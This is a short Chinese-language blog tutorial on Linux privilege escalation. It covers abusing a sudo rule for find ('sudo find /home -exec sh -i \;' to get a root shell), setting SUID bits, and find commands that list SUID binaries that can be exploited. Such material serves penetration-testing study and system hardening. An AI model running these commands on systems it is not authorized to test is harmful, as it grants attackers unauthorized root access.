此篇文章发布距今已超过686天,您需要注意文章的内容或图片是否可用!
sudo配置错误提权
为了方便普通用户,管理员可能会允许用户通过sudo运行一部分命令,这种情况很有可能会引入漏洞导致权限提升。比较典型的案例有将sudo权限分配给find命令,以便于普通用户能够查询相关文件。由于find命令包含执行命令的参数,因此可导致攻击者使用普通用户通过sudo执行find命令来获取root特权。
前提:当前普通用户能够通过sudo执行find命令
第一步:查看当前普通用户能够通过sudo执行哪些命令通过执行sudo –l可以看到anan这个用户是具有find命令的执行权限的
第二步:通过sudo执行find命令获取root权限sudo find /home -exec sh -i \;注解:find命令的-exec参数用于跟command命令
Suid提权
Suid简介
1.只有可以执行的二进制程序文件才能设定SUID权限,非二进制文件设置SUID权限没任何意义.3.命令执行者在执行该程序时获得该程序文件属主的身份.4.SUID权限只在该程序执行过程中有效,也就是说身份改变只在程序执行过程中有效示例:
命令:chmod u+s /usr/bin/find常见的可用来提权的Linux可执行文件有:
Namp、vim、find、bash、more、less、nano、cp查看可以suid提权的可执行文件的命令
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;
find / -user root -perm -4000 -print 2>/dev/null利用bash进行suid提权
执行find / -perm -u=s -type f 2>/dev/null,查看可以suid提前的可执行文件利用find进行suid提权
执行find / -perm -u=s -type f 2>/dev/null,查看可以suid提前的可执行文件
使用find /home/test –exec whoami \;命令提权执行whoami命令ZhouSa.com
还没有评论,来说两句吧...